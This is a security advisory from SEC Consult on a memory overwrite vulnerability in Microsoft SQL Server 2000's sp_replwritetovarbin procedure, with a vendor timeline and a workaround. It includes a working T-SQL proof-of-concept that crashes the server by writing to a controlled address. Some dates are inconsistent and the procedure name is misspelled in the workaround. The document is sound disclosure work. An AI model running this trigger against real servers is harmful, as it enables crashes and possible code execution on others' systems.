SEC Consult Security Advisory < 20081209-0 > ======================================================================== ============= title: Microsoft SQL Server 2000 sp_replwritetovarbin limited memory overwrite vulnerability program: Microsoft SQL Server 2000 vulnerable version: <=8.00.2039 homepage: www.microsoft.com found: 04-12-2008 by: Bernhard Mueller (SEC Consult Vulnerability Lab) perm. link: http://www.sec-consult.com/files/20081209_mssql-2000-sp_replwritetovarbi n_memwrite.txt ======================================================================== ============= Product description: -------------------- Microsoft SQL Server is a relational database management system (RDBMS) produced by Microsoft. Its primary query language is Transact-SQL, an implementation of the ANSI/ISO standard Structured Query Language (SQL) used by both Microsoft and Sybase. Vulnerabilty overview: ---------------------- By calling the extended stored procedure sp_replwritetovarbin, and supplying several uninitialized variables as parameters, it is possible to trigger a memory write to a controlled location. Depending on the underlying Windows version, it is / may be possible to use this vulnerability to execute arbitrary code in the context of the vulnerable SQL server process. In a default configuration, the sp_replwritetovarbin stored procedure is accessible by anyone. The vulnerability can be exploited by an authenticated user with a direct database connection, or via SQL injection in a vulnerable web application. Vulnerability details: ---------------------- The following T-SQL script can be used to test for the vulnerability: -------------------------------- DECLARE @buf NVARCHAR(4000), @val NVARCHAR(4), @counter INT SET @buf = ' declare @retcode int, @end_offset int, @vb_buffer varbinary, @vb_bufferlen int, @buf nvarchar; exec master.dbo.sp_replwritetovarbin 1, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' SET @val = CHAR(0x41) SET @counter = 0 WHILE @counter < 3000 BEGIN SET @counter = @counter + 1 SET @buf = @buf + @val END SET @buf = @buf + ''',''1'',''1'',''1'', ''1'',''1'',''1'',''1'',''1'',''1''' EXEC master..sp_executesql @buf -------------------------------- This triggers an access violation exception (write to address 0x41414141). The vulnerability has been successfully used to execute arbitrary code on a lab machine. SEC Consult will not release code execution exploits for this vulnerability to the public. Workaround: ----------- Remove the sp_replwriterovarbin extended stored procedure. Run the following as an administrator: execute dbo.sp_dropextendedproc 'sp_replwritetovarbin' See also: "Removing an Extended Stored Procedure from SQL Server" http://msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx Patch: ------ According to an email received by Microsoft in September, a fix for this vulnerability has been completed. The release schedule for this fix is currently unknown. Vendor timeline: --------------- Vendor notified: 2008-04-17 Vendor response: 2008-04-17 Last response from Microsoft: 09-29-2008 Request for update status 1: 10-14-2008 Request for update status 2: 10-29-2008 Request for update status 3: 11-12-2008 Request for update status 4 and prenotification about advisory release date: 11-28-2008 Public release: 11-09-2008 -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF Bernhard Mueller / @2008